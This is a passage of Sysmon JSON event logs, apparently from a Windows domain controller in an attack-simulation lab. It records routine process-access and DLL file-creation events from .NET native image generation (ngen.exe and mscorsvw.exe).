{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7395,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.152\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-001048260B00}\r\nTargetProcessId: 4288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.152","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-001048260B00}","TargetProcessId":"4288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7396,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:53.183\r\nProcessGuid: {E2A3D6B1-1325-5F25-0000-001048260B00}\r\nProcessId: 4288\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10c0-0\\TRLParserCOMInterface.dll\r\nCreationUtcTime: 2020-08-01 07:00:53.183","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:53.183","ProcessGuid":"{E2A3D6B1-1325-5F25-0000-001048260B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10c0-0\\TRLParserCOMInterface.dll","CreationUtcTime":"2020-08-01 07:00:53.183","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7397,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.183\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-00107B290B00}\r\nTargetProcessId: 3744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.183","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-00107B290B00}","TargetProcessId":"3744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7398,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.183\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-00107B290B00}\r\nTargetProcessId: 3744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.183","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-00107B290B00}","TargetProcessId":"3744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7399,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.199\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-00107B290B00}\r\nTargetProcessId: 3744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.199","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-00107B290B00}","TargetProcessId":"3744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7400,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.215\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-0010C92C0B00}\r\nTargetProcessId: 4712\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.215","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-0010C92C0B00}","TargetProcessId":"4712","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7401,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.215\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-0010C92C0B00}\r\nTargetProcessId: 4712\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.215","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-0010C92C0B00}","TargetProcessId":"4712","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7402,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.230\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-0010C92C0B00}\r\nTargetProcessId: 4712\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.230","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-0010C92C0B00}","TargetProcessId":"4712","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7403,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:53.261\r\nProcessGuid: {E2A3D6B1-1325-5F25-0000-0010C92C0B00}\r\nProcessId: 4712\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1268-0\\Microsoft.ActiveDirectory.TRLParserInterop.dll\r\nCreationUtcTime: 2020-08-01 07:00:53.261","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:53.261","ProcessGuid":"{E2A3D6B1-1325-5F25-0000-0010C92C0B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1268-0\\Microsoft.ActiveDirectory.TRLParserInterop.dll","CreationUtcTime":"2020-08-01 07:00:53.261","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7404,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.261\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-00102F300B00}\r\nTargetProcessId: 4708\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 